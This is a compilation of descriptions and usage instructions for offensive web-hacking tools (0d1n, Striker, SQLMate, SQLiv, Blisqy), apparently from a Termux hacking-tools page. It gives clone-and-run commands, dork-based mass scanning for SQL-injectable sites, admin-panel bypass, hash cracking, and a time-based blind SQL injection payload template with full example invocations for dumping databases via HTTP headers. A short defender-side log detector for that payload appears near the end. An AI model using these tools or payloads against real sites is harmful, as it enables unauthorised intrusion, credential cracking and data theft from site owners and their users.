Termux ID: SQLi

0d1n is a web security tool for fuzzing HTTP inputs, written in C with libcurl. It automates customized attacks against web applications.

You can do:
  • Brute-force passwords in authentication forms
  • Directory disclosure (brute-force with a path list and record the HTTP status code of each response)
  • Run a test list against an input to find SQL injection and XSS vulnerabilities
  • Option to load an anti-CSRF token on each request
  • Option to use a random proxy per request
  • Other functions...

To run (requires libcurl-dev, or libcurl-devel on rpm-based distributions):
$ git clone https://github.com/CoolerVoid/0d1n/
$ cd 0d1n
$ sudo apt-get install libcurl-dev      # Debian/Ubuntu based
$ sudo yum install libcurl-devel        # rpm based distributions
$ make
$ ./0d1n

0d1n v2.5 - Web Security Tool to Make Fuzzing at HTTP/S


Striker is an offensive information and vulnerability scanner.

Features
Just supply a domain name to Striker and it will automatically do the following for you:
  • Check for and bypass Cloudflare
  • Retrieve the Server and X-Powered-By headers
  • Fingerprint the operating system of the web server
  • Detect the CMS (197+ CMSs are supported)
  • Launch WPScan if the target is running WordPress
  • Retrieve robots.txt
  • Check whether the target is a honeypot
  • Port scan with banner grabbing
  • Dump all kinds of DNS records
  • Generate a map for visualizing the attack surface
  • Gather e-mail addresses related to the target
  • Find websites hosted on the same web server
  • Find hosts using Google
  • Crawl the website for URLs that carry parameters
  • SQLi scan using an online implementation of SQLMap (takes < 3 min.)
  • Basic XSS scanning


Striker - Offensive Information And Vulnerability Scanner


There are some features we think SQLMap should have, like finding the target's admin panel and better hash cracking. If you think the same, SQLMate is for you.

What does it do?
  • Feed it a SQL injection dork via the --dork option and it will find vulnerable sites for you. After that, it will try to find their admin panels and also try to bypass them with SQL queries.
  • It can do very fast hash lookups for MD5, SHA1 and SHA2. Supply a hash with the --hash option; an average lookup takes less than 2 seconds.
  • You can also supply a txt file containing hashes to be cracked with the --list option.
  • The first mode only checks the 13 most common admin panel locations, but if you feed a website through the --admin option you can do a full scan using 482 paths.
  • SQLMate can also scrape dorks. Specify the dumping level via the --dump option: --dump 1 dumps nearly 20 dorks, so set the level anywhere between 1 and 184 as needed. SQLMate automatically saves the dorks to a txt file so you can use them later.
Scroll down for more.

Running SQLMate
Enter the following command in terminal to download SQLMate
git clone https://github.com/UltimateHackers/sqlmate
Then navigate to the sqlmate directory by entering this command
cd sqlmate
Now install the required modules
pip install -r requirements.txt
Now run sqlmate
python sqlmate

Available command line options
usage: sqlmate [-h] [--dork DORK] [--hash HASH] [--list <path>]
[--dump 1-184] [--admin URL] [--type PHP,ASP,HTML]

optional arguments:
-h, --help show this help message and exit
--dork DORK Supply a dork and let SQLMate do its thing
--hash HASH 'Crack' a hash in 5 secs
--list <path> Import and crack hashes from a txt file
--dump 1-184 Get dorks. Specify dumping level. Level 1 = 20 dorks
--admin URL Find admin panel of website
--type PHP,ASP,HTML Choose extension to scan (Use with --admin option,
Default is all)


sqlmate - Tool which will do what you always expected from SQLmap


Massive SQL injection vulnerability scanner.

Features
  1. multiple domain scanning with a SQL injection dork via Bing, Google, or Yahoo
  2. targeted scanning by providing a specific domain (with crawling)
  3. reverse domain scanning
Both SQLi scanning and domain info checking are done with multiprocessing,
so the script is very fast at scanning many URLs.


Installation
  1. git clone https://github.com/Hadesy2k/sqlivulscan.git
  2. sudo python2 setup.py -i

Quick Tutorial
1. Multiple domain scanning with a SQLi dork
  • it searches for websites matching the given dork and scans the results one by one
python sqliv.py -d <SQLI DORK> -e <SEARCH ENGINE>
python sqliv.py -d "inurl:index.php?id=" -e google
2. Targeted scanning
  • you can provide only a domain name or a specific URL with query parameters
  • if only a domain name is provided, it will crawl the site and collect URLs with a query string
  • it then scans those URLs one by one
python sqliv.py -t <URL>
python sqliv.py -t www.example.com
python sqliv.py -t www.example.com/index.php?id=1
3. Reverse domain lookup and scanning
  • performs a reverse domain lookup and looks for websites hosted on the same server as the target URL
python sqliv.py -t <URL> -r
View help
python sqliv.py --help

usage: sqliv.py [-h] [-d D] [-e E] [-p P] [-t T] [-r]

optional arguments:
-h, --help show this help message and exit
-d D SQL injection dork
-e E search engine [Google only for now]
-p P number of websites to look for in search engine
-t T scan target website
-r reverse domain


Contributors
blackvkng
the-c0d3r

SQLiv - Massive SQL Injection Vulnerability Scanner


A slow data siphon for MySQL/MariaDB that uses bitwise operations on printable ASCII characters, driven through a blind SQL injection.

Usage
USAGE:
blisqy.py --server <Web Server> --port <port> --header <vulnerable header> --hvalue <header value>
--inject <point of injection> --payload <custom sql payload> --dig <yes/no> --sleeptime <default 0.5>

Options:
-h, --help show this help message and exit
--server=WEBSERVER Specify host (web server) IP
--port=PORT Specify port
--header=VULNHEADER Provide a vulnerable HTTP Header
--hvalue=HEADERVALUE Specify the value for the vulnerable header
--inject=INJECTION Provide where to inject Sqli payload
--payload=PAYLOAD Provide SQL statment/query to inject as payload
--dig=DIGGER Automatic Mysql-Schema enumeration (takes time!)
--sleeptime=SLEEP Sleep-Time for blind-SQLi query (default : 0.5)
--interactive=INTERACT
Turn interactive mode on/off (default : off)

Basics
Blisqy will assist you in enumerating a MySQL/MariaDB database after you have found a time-based blind SQL injection vulnerability on a web server. Currently it supports injections in HTTP headers. You should already have identified a potential blind SQL injection vulnerability on a web server, as demonstrated in Pentester-Lab (From SQL Injection to Shell II).
So you can't run Blisqy without:
  • --server : the vulnerable web server
  • --port : the port the web server is running on
  • --header : the identified vulnerable HTTP header
  • --hvalue : the value for the identified vulnerable HTTP header
and most importantly --inject : what to inject after the hvalue (the SQLi payload).

Options :

--inject
After identifying a time-based blind SQL injection on a web server, this option lets the user craft and insert SQL injection payloads. The value for this option should look like this:
--inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
Where
  • *sql* - is where SQL Payloads will be inserted and
  • *time* - is where Time-Based test will be inserted.

--sleeptime
Blisqy accepts a user-set --sleeptime, which is inserted at the *time* placeholder of --inject. Always fine-tune this value to match your environment and network latency; otherwise you'll be toasted! (The lower the value, the faster it goes.) E.g. --sleeptime 0.1

--payload
This option allows the user to run their own custom SQL injection payloads. Other options like --dig and --interactive must not be set (leave them out) for this option to run.

Example:
Command
./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" \
  --sleeptime 0.1 \
  --inject "' or if((*sql*),sleep(*time*),0) and '1'='1" \
  --payload "select @@hostname"


--interactive
This option accepts two values, on or off, and complements the --dig option (which must be set to yes). With --interactive on, the user gets to choose which discovered table to enumerate and decide whether data from the table should be dumped or not. With --interactive off, every table gets enumerated and all data is dumped.

Getting data from a table:
The user can decide which columns to extract data from when --interactive is on. The format looks like this: column1*column2*column3, i.e. just the column names separated by asterisks. The user can also skip data collection on a particular table by entering skip instead of the column names.

Example:
Command
./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" --dig yes \
  --sleeptime 0.1 --interactive on --inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
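A defender-side complement to the header-injection technique described above, added here as an example and not part of Blisqy or its documentation: a small Python detector that scans constructed web-server log lines for the ingredients of a time-based blind payload in a request header (a quote-break, the if((...),...) wrapper and a sleep()/benchmark() delay call) and correlates them with slow responses per client, which is the timing fingerprint a true condition leaves behind. The one-request-per-line log format, the sample lines and the 400 ms threshold are assumptions.

```python
import re
# Constructed sample log (not real server output), one request per line:
# "<client ip> <header name>: <header value> <elapsed ms>"
SAMPLE_LOG = """\
203.0.113.9 X-Forwarded-For: 10.0.0.5 12
203.0.113.9 X-Forwarded-For: 10.0.0.5 15
198.51.100.7 X-Forwarded-For: hacker' or if((1=1),sleep(0.5),0) and '1'='1 530
198.51.100.7 X-Forwarded-For: hacker' or if((1=2),sleep(0.5),0) and '1'='1 14
198.51.100.7 X-Forwarded-For: hacker' or if((1=1),sleep(0.5),0) and '1'='1 522
192.0.2.3 User-Agent: Mozilla/5.0 9
"""

LINE_RE = re.compile(r"^(\S+) ([\w-]+): (.*) (\d+)$")

# Indicators of a Blisqy-style time-based payload: the delay primitive, the
# if((...),...) wrapper of the --inject template, and the quote-break before it.
INDICATORS = {
    "delay-function": re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE),
    "conditional": re.compile(r"\bif\s*\(\s*\(", re.IGNORECASE),
    "quote-break": re.compile(r"'\s*(or|and)\b", re.IGNORECASE),
}

def score_header(value):
    """Names of the indicators present in one header value (empty if none)."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]

def detect(log_text, slow_ms=400):
    """Group flagged requests per client IP; a response at or above slow_ms on a
    flagged request counts as a slow hit (a true condition that fired the sleep)."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # line does not fit the assumed format
        ip, header, value, elapsed = m.group(1), m.group(2), m.group(3), int(m.group(4))
        hits = score_header(value)
        if not hits:
            continue
        e = findings.setdefault(ip, {"headers": set(), "indicators": set(), "requests": 0, "slow_hits": 0})
        e["headers"].add(header)
        e["indicators"].update(hits)
        e["requests"] += 1
        if elapsed >= slow_ms:
            e["slow_hits"] += 1
    return findings

def time_based_suspects(findings):
    """Clients whose payloads carry a delay call and that actually produced slow responses."""
    return sorted(ip for ip, e in findings.items() if "delay-function" in e["indicators"] and e["slow_hits"] > 0)
```

Feeding real logs only requires replacing LINE_RE with a pattern for the server's own access-log format; the indicator patterns and the slow-response correlation stay the same.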



Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)